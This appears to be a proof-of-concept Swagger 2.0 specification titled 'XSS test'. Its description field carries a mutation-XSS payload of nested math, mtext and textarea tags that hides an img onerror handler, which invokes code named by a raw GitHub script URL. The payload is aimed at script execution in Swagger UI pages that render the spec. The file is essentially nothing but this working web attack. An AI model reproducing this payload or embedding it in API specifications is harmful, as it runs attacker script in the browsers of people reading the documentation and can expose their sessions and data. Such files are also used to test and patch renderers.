swagger: '2.0'
info:
  title: XSS test
  description: <math><mtext><h1><a><h6></a></h6><textarea><a title="</textarea><img src onerror %09=top['https://raw.githubusercontent.com/VictorNS69/swagger-ui-xss/main/script.js']()>>
  
 

                
  version: production
